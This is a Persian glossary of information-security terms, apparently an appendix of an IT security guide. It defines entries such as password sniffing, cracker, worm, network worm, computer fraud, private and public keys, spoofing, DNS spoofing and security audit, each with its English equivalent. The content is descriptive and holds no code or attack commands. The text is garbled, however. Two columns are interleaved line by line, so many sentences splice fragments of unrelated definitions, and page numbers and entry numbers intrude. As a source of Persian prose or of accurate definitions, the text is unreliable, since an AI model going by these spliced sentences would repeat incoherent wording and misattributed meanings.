‫ﻳﻚ ﺭﺷﺘﻪ ﺣﺮﻭﻑ ﻳﻜﺘﺎ ﻛﻪ ﻫﺮ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻲﺷﻨﺎﺳﺎﻧﺪ‪.‬‬
‫ﻳﻚ ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﺧﺎﺹ ﻭ ﺗﺤﺖ ﺷﺮﺍﻳﻂ ﻣﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ ﺑـﻪ ﺍﻧﺠـﺎﻡ‬
‫ﺭﺳﺎﻧﺪ‪.‬‬ ‫‪٤٣٨‬‬
‫ﺷﻨﻮﺩ ﺭﻣﺰ ﻋﺒﻮﺭ‬
‫‪٤٤٢‬‬ ‫ﻻ ﺭﻭﻱ ﻳﻚ ﺷـﺒﻜﺔ ﻣﺤﻠـﻲ‪ ،‬ﺑـﺮﺍﻱ‬
‫ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻣﺨﻔﻴﺎﻧﻪ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻘﻴﺎﺱﭘﺬﻳﺮﻱ‬
‫ﻓﻬﻤﻴﺪﻥ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪.‬‬
‫ﻗﺎﺑﻠﻴﺖ ﮔﺴﺘﺮﺵ ﻳﻚ ﺭﺍﻩﺣﻞ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺑﺎ ﻛﻤﺘـﺮﻳﻦ‬
‫ﺗﺄﺛﻴﺮ ﺑﺮ ﻛﺎﺭﺁﻳﻲ‪ ،‬ﺑﺘﻮﺍﻥ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﮔـﺮﻭﻩ ﺑﺰﺭﮔﺘـﺮﻱ ﺍﺯ ﻛـﺎﺑﺮﺍﻥ‬ ‫‪٤٣٩‬‬
‫ﻃﺮﺡ ﺍﻗﺘﻀﺎﻳﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬ ‫ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﻣﻨﺎﺑﻊ ﻣﻬـﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫‪٤٤٣‬‬ ‫ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺣﻮﺍﺩﺙ ﻧﺎﮔﻮﺍﺭ )ﻣﺜﻞ ﺯﻟﺰﻟﻪ ﻳﺎ ﺳﻴﻞ( ﺑﺮﺍﻱ ﺳـﺎﺯﻣﺎﻥ‬
‫ﻗﻔﻞﺷﻜﻦ‬
‫ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨﺪ‪ .‬ﺍﻳﻦ ﻃﺮﺡ ﺷﺎﻣﻞ ﻋﻤﻠﻴـﺎﺕ ﻭﺍﻛـﻨﺶ‬
‫ﻛﺴﻲ ﻛﻪ ﺳﻌﻲ ﺩﺍﺭﺩ ﺑﺪﻭﻥ ﻛﺴﺐ ﻣﺠﻮﺯ‪ ،‬ﺍﻣﻨﻴﺖ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍ‬
‫ﺍﺿﻄﺮﺍﺭﻱ‪ ،‬ﻋﻤﻠﻴﺎﺕ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‪ ،‬ﻭ ﻋﻤﻠﻴـﺎﺕ ﺗـﺮﻣﻴ ﹺﻢ ﭘـﺲ ﺍﺯ‬
‫ﺧﺪﺷﻪﺩﺍﺭ ﻧﻤﺎﻳﺪ ﻭ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪) .‬ﺗﻌﺮﻳـﻒ ‪ Hacker‬ﺭﺍ‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫ﺣﺎﺩﺛﻪ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﻣﻮﺭﺩ ﻣﻼﺣﻈﻪ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪(.‬‬

‫‪434 Personal Identification Number‬‬


‫‪435 Identification‬‬
‫‪440 Attachment‬‬ ‫‪436 User Identification‬‬
‫‪441 Reliability‬‬ ‫‪437 User ID‬‬
‫‪442 Scalability‬‬ ‫‪438 Password Sniffing‬‬
‫‪443 Cracker‬‬ ‫‪439 Contingency Plan‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٦٢‬‬

‫‪٤٥٠‬‬ ‫‪٤٤٤‬‬
‫ﻛﻠﻴﺪ‬ ‫ﻛﺎﺭﺑﺮ‬
‫ﺩﺭ ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ،‬ﺳﻠﺴﻪﺍﻱ ﺍﺯ ﺣﺮﻭﻑ ﺍﺳﺖ ﻛﻪ ﺑﻤﻨﻈﻮﺭ ﺗﺒﺪﻳﻞ ﻳﻚ‬ ‫ﻫﺮ ﺷﺨﺼﻲ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﺎ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ ﺗﻌﺎﻣـﻞ‬
‫ﻓﺎﻳﻞ ﺑﻪ ﻭ ﻳﺎ ﺍﺯ ﻗﺎﻟﺐ ﺭﻣﺰﻱ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﺩ‪ .‬ﺷـﻤﺎ ﺑـﻪ ﺩﻭ ﺷـﻜﻞ‬ ‫ﺑﺎﺷﺪ‪.‬‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﻠﻴﺪ ﺭﺍ ﻭﺍﺭﺩ ﻛﻨﻴﺪ‪ :‬ﺑﻪ ﺷﻜﻞ ﺣﺮﻭﻑ ﺍﻟﻔﺒﺎ ﻭ ﺍﻋﺪﺍﺩ )ﺍﺭﻗﺎﻡ‬
‫‪٤٤٥‬‬
‫ﺩﺭ ﻣﺒﻨﺎﻱ ‪ ،(۱۶‬ﻭ ﻳﺎ ﺑﺼﻮﺭﺕ ﻓﺸﺮﺩﻩ‪ .‬ﺩﺭ ﺑﺎﺯﺍﺭ ﺍﻣﻨﻴﺖ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ‬ ‫ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ‬
‫ﺷﺒﻜﻪ‪" ،‬ﻛﻠﻴﺪ" ﻏﺎﻟﺒﹰﺎ ﺑﻪ "ﻧﺸﺎﻥ" ﻳـﺎ ﻳـﻚ ﺍﺑـﺰﺍﺭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬ ‫ﻭﺳﻴﻠﻪﺍﻱ ﻣﺸﺎﺑﻪ ﻳﻚ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎ ﻣﺪﺍﺭ ﻣﻴﻜﺮﻭﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺍﻃﻼﻕ ﻣﻲﺷﻮﺩ؛ ﻭﺳﻴﻠﻪﺍﻱ ﻛﻪ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﻭ ﺩﺭﻳﺎﻓﺖ ﻣﺘﻘﺎﺑﻞ‬ ‫ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺷﺨﺺ‪ .‬ﺍﻳﻦ ﻭﺳـﻴﻠﻪ ﻳـﻚ‬
‫ﭘﺮﺳــﺸﻬﺎ ﻭ ﭘﺎﺳــﺨﻬﺎ ﺩﺭ ﻃــﻮﻝ ﻓﺮﺁﻳﻨــﺪ ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ ﺑﻜــﺎﺭ‬ ‫ﻛﻠﻴﺪ ﻳﺎ ﻧﺸﺎﻥ ‪ -‬ﻣﺸﺎﺑﻪ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﻣﻲﺭﻭﺩ‪ .‬ﻛﻠﻴﺪﻫﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻭﺳـﺎﻳﻞ ﺳـﺨﺖﺍﻓـﺰﺍﻱ ﻛﻮﭼـﻚ‬ ‫ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ‪ -‬ﻧﻴﺴﺖ‪.‬‬
‫ﻣﺸﺎﺑﻪ ﻣﺎﺷﻴﻦﺣﺴﺎﺑﻬﺎﻱ ﺟﻴﺒﻲ ﻳﺎ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎﺷﻨﺪ‪ ،‬ﻭ ﻳـﺎ‬ ‫‪٤٤٦‬‬
‫ﻛﺪﮔﺸﺎﻳﻲ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺷﺨﺼﻲ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻧـﺮﻡﺍﻓـﺰﺍﺭ‬
‫ﺗﺒﺪﻳﻞ ﻣﺘﻮﻥ ﻛﺪﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﻪ ﻣﺘﻮﻥ ﺳﺎﺩﺓ ﺍﻭﻟﻴﻪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺣﻔﺎﻇﺖﺷﺪﻩ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻳﻚ ﺭﻭﺵ ﻛﺪﮔﺬﺍﺭﻱ ﻭ ﻛﺪﮔﺸﺎﻳﻲ ﻣﺘﻘﺎﺑﻞ‪.‬‬
‫‪٤٥١‬‬
‫ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ‬ ‫‪٤٤٧‬‬
‫ﻛﺮﻡ‬
‫ﺁﻥ ﺟﺰﺀ ﺍﺯ ﻳﻚ ﺟﻔﺖ ﻛﻠﻴﺪ ﺭﻣﺰ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﻛﻪ ﺗﻮﺳـﻂ‬
‫ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻄﻮﺭ ﻣﺴﺘﻘﻞ ﺍﺟﺮﺍ ﺷﻮﺩ‪ ،‬ﻧـﻮﻉ‬
‫ﻣﺎﻟﻚ ﺁﻥ ﺑﺼﻮﺭﺕ ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲ ﺷﻮﺩ‪ .‬ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ‬
‫ﻛﺎﻣﻠﻲ ﺍﺯ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺩﻳﮕﺮ ﺷﺒﻜﻪ ﺗﻜﺜﻴﺮ ﻛﻨﺪ‪ ،‬ﻣﻨﺎﺑﻊ‬
‫ﺑــﺮﺍﻱ ﺭﻣﺰﮔــﺸﺎﻳﻲ ﭘﻴﺎﻣﻬــﺎﻳﻲ ﻛــﻪ ﺑــﺎ ﻛﻠﻴــﺪ ﻋﻤــﻮﻣﻲ ﻣﺘﻨــﺎﻇﺮ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﺨﺮﺏ ﻣﺼﺮﻑ ﻧﻤﺎﻳﺪ؛ ﻭ ﻧﻬﺎﻳﺘـﹰﺎ ﻣﻨﺠـﺮ ﺑـﻪ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﺑﻜـﺎﺭ ﻣـﻲﺭﻭﺩ‪ .‬ﺍﻳـﻦ ﻛﻠﻴـﺪ ﻫﻤﭽﻨـﻴﻦ ﺩﺭ‬
‫ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺭﻭﻱ ﺷﺒﻜﻪ ﻳﺎ ﺷﺒﻜﻪﻫﺎ ﮔﺮﺩﺩ‪.‬‬
‫ﺍﻳﺠﺎﺩ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ‪ ،‬ﺳـﻨﺪﻱ‬
‫ﻛﻪ ﺑﺎﻳﺪ ﺍﻣﻀﺎ ﺷﻮﺩ ﺑﺎ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺩﺭﻫﻤﺮﻳﺰﻱ ﺧﻼﺻـﻪﺳـﺎﺯﻱ‬ ‫‪٤٤٨‬‬
‫ﻛﺮﻡ ﺷﺒﻜﻪﺍﻱ‬
‫ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﺳﭙﺲ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ ﺭﻣﺰﮔـﺬﺍﺭﻱ‬ ‫ﻓﺎﻳﻞ ﺩﺳﺘﻮﺭﻱ ﻳﺎ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺍﺯ ﻳﻚ ﺷﺒﻜﺔ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑﻌﻨـﻮﺍﻥ‬
‫ﻣﻲﮔﺮﺩﺩ‪ .‬ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﻣﺠﻤﻮﻋـﹰﺎ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﺭﺍ ﺗـﺸﻜﻴﻞ‬ ‫ﻭﺳﻴﻠﻪﺍﻱ ﺑﺮﺍﻱ ﺗﺄﺛﻴﺮﮔﺬﺍﺭﻱ ﻧﺎﻣﻄﻠﻮﺏ ﺑﺮ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻـﺤﺖ‪،‬‬
‫ﻣﻲﺩﻫﺪ‪.‬‬ ‫ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ‪ ،‬ﻭ ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫‪٤٥٢‬‬ ‫ﻣﻲﻛﻨﺪ‪ .‬ﻛﺮﻡ ﺷﺒﻜﻪﺍﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﺎ ﺑﺮﻗـﺮﺍﺭﻱ ﻳـﻚ ﺍﺭﺗﺒـﺎﻁ‬
‫ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ‬
‫ﺷﺒﻜﻪﺍﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻲ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﺩﻳﮕـﺮ ﺣﻤﻠـﻪ ﻛﻨـﺪ‪ .‬ﻛﺮﻣﻬـﺎ‬
‫ﺁﻥ ﺟﺰﺀ ﺍﺯ ﻳﻚ ﺟﻔﺖ ﻛﻠﻴﺪ ﺭﻣﺰ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﻛﻪ ﻫﻤﻪ ﺍﺯ‬ ‫ﻻ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺴﺘﻘﻠﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺷﺒﻜﻪﻫـﺎ‬ ‫ﻣﻌﻤﻮ ﹰ‬
‫ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺭﻧﺪ‪ .‬ﺍﺯ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺍﻃﻼﻋـﺎﺗﻲ‬ ‫ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﻳﻚ ﻓﺎﻳﻞ ﻣﻴﺰﺑﺎﻥ ﻣﺘﺼﻞ ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺗﻨﻬﺎ ﺑﻪ ﻳﻚ ﮔﻴﺮﻧﺪﺓ ﺧﺎﺹ ﺑﺮﺳﺪ‪ ،‬ﻭ ﻳﺎ ﺭﻣﺰﮔﺸﺎﻳﻲ‬ ‫‪٤٤٩‬‬
‫ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫ﻳﻚ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﻭ ﺻـﺤﺖ‬
‫ﭘﻴﺎﻡ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬ ‫ﻳﻚ ﺗﺨﻠﻒ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻃﻲ ﺁﻥ ﻣﻬـﺎﺟﻢ ﺑـﺮﺍﻱ ﺑﺪﺳـﺖ ﺁﻭﺭﺩﻥ‬
‫ﭘﻮﻝ‪ ،‬ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻳﺎ ﺳﺮﻣﺎﻳﺔ ﺩﻳﮕـﺮﻱ ﺍﺯ ﻳـﻚ ﺷـﺮﻛﺖ ﻳـﺎ ﻳـﻚ‬
‫ﻛﻨﺘﺮﻝ‬ ‫ﻻ ﻫﻤﺔ ﺍﻧﻮﺍﻉ ﺟـﺮﺍﺋﻢ‬
‫ﺷﺨﺺ ﺣﻘﻴﻘﻲ ﻣﺮﺗﻜﺐ ﺁﻥ ﻣﻲﺷﻮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻋﻤﻠﻴﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺷﺮﻛﺖ‪ ،‬ﻛﻪ ﺁﻧـﺮﺍ ﺑـﺮﺍﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺓ‬ ‫ﻻ ﺷﺎﻣﻞ‬‫ﺩﺭ ﺍﻳﻦ ﺗﻌﺮﻳﻒ ﻣﻲﮔﻨﺠﻨﺪ‪ .‬ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻓﺸﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺑﻜﺎﺭ ﻣﻲﺑﻨﺪﺩ‪.‬‬ ‫ﺗﻐﻴﻴﺮ‪ ،‬ﺗﺨﺮﻳﺐ‪ ،‬ﺳﺮﻗﺖ‪ ،‬ﻭ ﺍﻓﺸﺎﻱ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺷﻮﺩ‪.‬‬

‫‪444 User‬‬
‫‪445 Smart Card‬‬
‫‪446 Decode‬‬
‫‪450 Key‬‬ ‫‪447 Worm‬‬
‫‪451 Private Key‬‬ ‫‪448 Network Worm‬‬
‫‪452 Public Key‬‬ ‫‪449 Computer Fraud‬‬
‫‪٤٦٣‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫‪٤٥٨‬‬ ‫‪٤٥٣‬‬
‫ﻣﺨﺎﻃﺮﻩ‬ ‫ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ‬
‫ﺍﺣﺘﻤﺎﻝ ﺍﻳﻨﻜﻪ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺧﺎﺹ ﺳﻴﺴﺘﻢ ﺗﺼﺎﺩﻓﹰﺎ ﻳﺎ ﺗﻌﻤﺪﹰﺍ‬ ‫ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺭﻭﺍﻟﻬـﺎ ﻛـﻪ ﺗﻮﺳـﻂ ﻧـﺮﻡﺍﻓـﺰﺍﺭ‪ ،‬ﺳـﺨﺖﺍﻓـﺰﺍﺭ‪ ،‬ﻭ‬
‫ﻣﻮﺭﺩ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪.‬‬ ‫ﺭﺍﻫﺒﺮﺍﻥ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﺩﺳﺘﺮﺳﻲ‪ ،‬ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺘﻘﺎﺿـﻲ‬
‫ﺩﺳﺘﺮﺳﻲ‪ ،‬ﺿﺒﻂ ﺗﻼﺷﻬﺎﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ‪ ،‬ﻭ ﺍﻋﻄـﺎ ﻳـﺎ ﺳـﻠﺐ‬
‫‪٤٥٩‬‬
‫ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺧﻄﺮ‬ ‫ﺩﺳﺘﺮﺳﻲ ﺍﻧﺠـﺎﻡ ﻣـﻲﺷـﻮﺩ‪ .‬ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻭ ﻛﻨﺘﺮﻟﻬـﺎﻱ‬
‫ﻋﻤﻠﻴﺎﺗﻲ ﻛﻪ ﻳﻚ ﺷﺮﻛﺖ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﺗﻬﺪﻳﺪﺍﺕ ﻳـﻚ ﺳﻴـﺴﺘﻢ‬ ‫ﺩﺳﺘﺮﺳﻲ ﺑﺎﻳﺪ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻫﻤﺎﻫﻨﮓ ﺑﺎﺷﻨﺪ ﺗﺎ ﺍﺯ ﻛﺎﺭﺑﺮﺩ ﻏﻴﺮﻣﺠﺎﺯ‬
‫ﺍﺗﺨﺎﺫ ﻣﻲﻛﻨﺪ‪ .‬ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺧﻄﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻬﻴﻪ ﻭ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﻳـﻚ‬ ‫ﻫﺮﻳﻚ ﺍﺯ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻤﻲ ﺗﻮﺳﻂ ﻋﻮﺍﻣﻞ ﺧﺎﺭﺟﻲ )ﻣﻬﺎﺟﻤـﺎﻥ( ﻭ ﻳﺎ‬
‫ﺍﺑﺰﺍﺭ ﺳﺨﺖﺍﻓﺰﺍﻱ‪ ،‬ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‪ ،‬ﻭ ﻳﺎ ﻳﻚ ﺭﻭﺍﻝ ﺍﻧﺠـﺎﻡ ﻛـﺎﺭ‬ ‫ﻋﻮﺍﻣﻞ ﺩﺍﺧﻠﻲ )ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﻧﺒﺎﻳﺪ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ( ﺟﻠـﻮﮔﻴﺮﻱ‬
‫ﺑﺎﺷﺪ‪.‬‬ ‫ﺷﻮﺩ‪.‬‬
‫‪٤٦٠‬‬
‫ﻣﻤﻴﺰﻱ‬ ‫‪٤٥٤‬‬
‫ﮔﻤﺮﺍﻩﺳﺎﺯﻱ‬
‫ﺟﻤــﻊﺁﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﺫﺧﻴــﺮﻩﺷــﺪﺓ ﻣــﺴﺘﻘﻞ ﺑــﺮﺍﻱ ﺑﺮﺭﺳــﻲ ﻭ‬ ‫ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﺯ ﻃﺮﻳﻖ ﺗﻐﻴﻴـﺮ ﭼﻬـﺮﻩ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺁﻧﻬﺎ‪.‬‬ ‫ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ‪.‬‬
‫‪٤٦١‬‬
‫ﻣﻤﻴﺰﻱ ﺍﻣﻨﻴﺘﻲ‬ ‫‪٤٥٥‬‬
‫ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺩﺍﻣﻨﻪ‬
‫ﺑﺎﺯﺑﻴﻨﻲ ﻣﺴﺘﻘﻞ ﻭ ﺣﺮﻓﻪ ﺍﻱ ﺍﻣﻨﻴﺖ ﻛﻪ ﺗﻄﺒﻴﻖ ﻛﻨﺘﺮﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‬ ‫ﺑﻪ ﺣﺎﻟﺘﻲ ﮔﻔﺘﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ‪ -‬ﺑﺎ ﺗﺨﺮﻳﺐ ﺁﻥ ﻗـﺴﻤﺖ‬
‫ﺷﺮﻛﺖ ﺑﺎ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ‪ .‬ﻃﺒﻖ ﻧﺘﻴﺠﺔ‬ ‫ﺍﺯ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﻳـﺎ‬
‫ﺍﻳﻦ ﺑﺎﺯﺑﻴﻨﻲ‪ ،‬ﺣﺴﺎﺑﺮﺱ ﻗﺎﺩﺭ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺗﻐﻴﻴﺮﺍﺕ ﻻﺯﻡ ﺩﺭ ﻣـﻮﺭﺩ‬ ‫ﺗﺴﺨﻴﺮ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺑﺮﺍﻱ ﻳﻚ ﺩﺍﻣﻨﺔ ﻣﻌﺘﺒﺮ ‪ -‬ﺧـﻮﺩ‬
‫ﻛﻨﺘﺮﻟﻬﺎ‪ ،‬ﺳﻴﺎﺳﺘﻬﺎ‪ ،‬ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻧﻴﺰ ﭘﻴﺸﻨﻬﺎﺩ ﻛﻨﺪ‪.‬‬ ‫ﺭﺍ ﺑﺠﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ﺟﺎ ﻣﻲﺯﻧﺪ‪.‬‬
‫‪٤٦٢‬‬
‫ﻣﻬﺎﺟﻢ‬ ‫‪٤٥٦‬‬
‫ﻣﺠﻮﺯ‬
‫ﻣﻮﺟﻮﺩﻱ ﻛﻪ ﺑـﺪﻭﻥ ﻣﺠـﻮﺯ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻳـﺎ ﻣﻨـﺎﺑﻊ ﺳﻴـﺴﺘﻤﻲ‬ ‫ﻋﻤﻠﻴﺎﺕ ﻣﺠﺎﺯﻱ )ﺧﻮﺍﻧﺪﻥ‪ ،‬ﻧﻮﺷـﺘﻦ‪ ،‬ﺍﺻـﻼﺡ ﻭ ﺣـﺬﻑ( ﻛـﻪ ﺷـﺨﺺ‬
‫ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﻭ ﻳﺎ ﺑﺮﺍﻱ ﺑﺪﺳﺖﺁﻭﺭﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺗﻼﺵ‬ ‫ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﻫﺪﻑ )ﻣﺜ ﹰﻼ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ( ﺍﻧﺠـﺎﻡ‬
